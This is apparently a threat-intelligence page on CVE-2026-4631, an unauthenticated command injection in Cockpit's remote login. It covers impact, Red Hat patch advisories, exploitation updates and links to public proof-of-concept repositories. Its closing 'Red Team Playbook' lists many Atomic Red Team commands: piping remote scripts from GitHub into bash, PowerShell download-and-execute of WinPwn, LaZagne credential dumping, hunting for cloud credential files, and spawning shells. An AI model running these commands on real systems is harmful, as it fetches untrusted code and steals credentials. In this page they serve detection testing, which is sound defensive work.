CVE-2026-4631
Overview
This vulnerability is a command injection flaw rooted in improper input validation within Cockpit's remote login feature. Specifically, user-supplied hostnames and usernames submitted through the web interface are forwarded directly to the SSH client without sanitization. The affected component is the Cockpit web service's login endpoint on Red Hat Enterprise Linux 10, where the injection occurs during the SSH authentication flow prior to credential verification.
Vulnerability Description
Cockpit's remote login feature passes user-supplied hostnames and usernames from the web interface to the SSH client without validation or sanitization. An attacker with network access to the Cockpit web service can craft a single HTTP request to the login endpoint that injects malicious SSH options or shell commands, achieving code execution on the Cockpit host without valid credentials. The injection occurs during the authentication flow before any credential verification takes place, meaning no login is required to exploit the vulnerability.
Impact
An attacker with network access to the Cockpit web service can execute arbitrary commands on the host system without any authentication. This allows full system compromise, including unauthorized access to sensitive data and potential lateral movement within the network. No user credentials or interaction are required, significantly lowering the barrier to exploitation and increasing the risk of remote takeover of affected systems.
Solution
Red Hat has issued multiple advisories addressing this issue for Red Hat Enterprise Linux 10, specifically RHSA-2026:7381, RHSA-2026:7382, RHSA-2026:7383, and RHSA-2026:7384. Users should apply the patches provided in these advisories promptly. Detailed patch instructions and additional mitigation guidance are available at Red Hat's official security pages linked in the advisories.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with Cockpit's remote login feature stems from its failure to properly validate and sanitize user-supplied hostnames and usernames before passing them to the SSH client. This oversight allows an attacker with network access to the Cockpit web service to craft a malicious HTTP request targeting the login endpoint. By injecting harmful SSH options or shell commands, the attacker can execute arbitrary code on the Cockpit host without needing valid credentials. This exploitation occurs during the authentication process, prior to any credential verification, significantly lowering the barrier for an attacker to gain unauthorized access.
Attack vectors for this vulnerability are particularly concerning due to the simplicity of the exploitation method. An attacker could leverage a variety of techniques, including man-in-the-middle attacks, to intercept and manipulate the HTTP requests sent to the Cockpit web service. Additionally, if the attacker is already within the network, they could directly target the service, making it even easier to exploit the vulnerability. Scenarios could involve an attacker injecting commands that could lead to the installation of malware, data exfiltration, or even complete system compromise. The lack of authentication requirements for exploitation means that even a novice attacker with basic knowledge of HTTP requests could potentially execute harmful commands on the affected system.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on Cockpit for managing servers and applications. Given the high CVSS score of 9.8, the risk associated with this vulnerability is categorized as critical. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and significant financial losses due to downtime or data breaches. Furthermore, the potential for lateral movement within a network could allow attackers to compromise additional systems, escalating the overall risk to the organization. The reputational damage resulting from such an incident could also have long-lasting effects, particularly in industries where data integrity and security are paramount.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify exposed services and potential weaknesses. Additionally, network segmentation can limit the exposure of the Cockpit web service to untrusted networks, reducing the likelihood of an attacker gaining access. Organizations should also enforce strict access controls and monitor logs for unusual activity that may indicate exploitation attempts. Updating to the latest version of Cockpit, where the vulnerability is addressed, is crucial. Furthermore, implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer, providing an additional layer of defense.
In conclusion, the vulnerability within Cockpit's remote login feature represents a significant threat to organizations utilizing this tool for server management. The ease of exploitation, combined with the potential for severe consequences, underscores the importance of proactive security measures. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities and protect their critical assets.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2026-4631, driven by the emergence of publicly available proof-of-concept exploit code and its subsequent publication on prominent exploit repositories. This development has catalyzed an expansion in the exploit landscape, with new tools enabling unauthenticated remote code execution against vulnerable Cockpit instances. Our telemetry indicates a significant uptick in attempts to leverage this vulnerability, underscoring an increased attacker interest and operationalization. The assignment of a critical CVSS score of 9.8 and the appearance of a substantial EPSS score further elevate the urgency of this threat. For defenders, this shift signals a heightened risk environment where exploitation can occur without credential validation, increasing the likelihood of successful compromise. Consequently, the threat level associated with CVE-2026-4631 has escalated from theoretical to actively exploited, necessitating heightened vigilance and prioritization in defensive postures.
Update 2 — July 22, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-4631, evidenced by a significant rise in detection activity within our telemetry. This surge reflects increased attacker operationalization, likely driven by the availability of new proof-of-concept exploits circulating publicly. The persistence of a high EPSS score underscores sustained exploitability and attacker interest. For defenders, this intensification signals a more aggressive threat environment where adversaries are actively leveraging unauthenticated injection vectors to achieve remote code execution on vulnerable Cockpit hosts. Consequently, the risk profile for this vulnerability has shifted from emerging to actively exploited, elevating its priority within threat mitigation frameworks and necessitating enhanced monitoring and response readiness.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Cockpit 359 - RCE | Abdelazim Mohammed | webapps | multiple | - | View |
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
cyberheartmi9/CVE-2026-4631-cockpit-RCE
Cockpit: Unauthenticated Remote Code Execution via SSH Command-Line Argument Injection
|
cyberheartmi9 | 14 | 6 | 2026-04-18 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
ExDev994/CVE-2026-4631-cockpit-RCE
Unauthenticated Remote Code Execution via SSH Command-Line Argument Injection Cockpit versions 327 – 359 | CVSS 9.8 Crit...
|
ExDev994 | 0 | 0 | 2026-07-12 | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.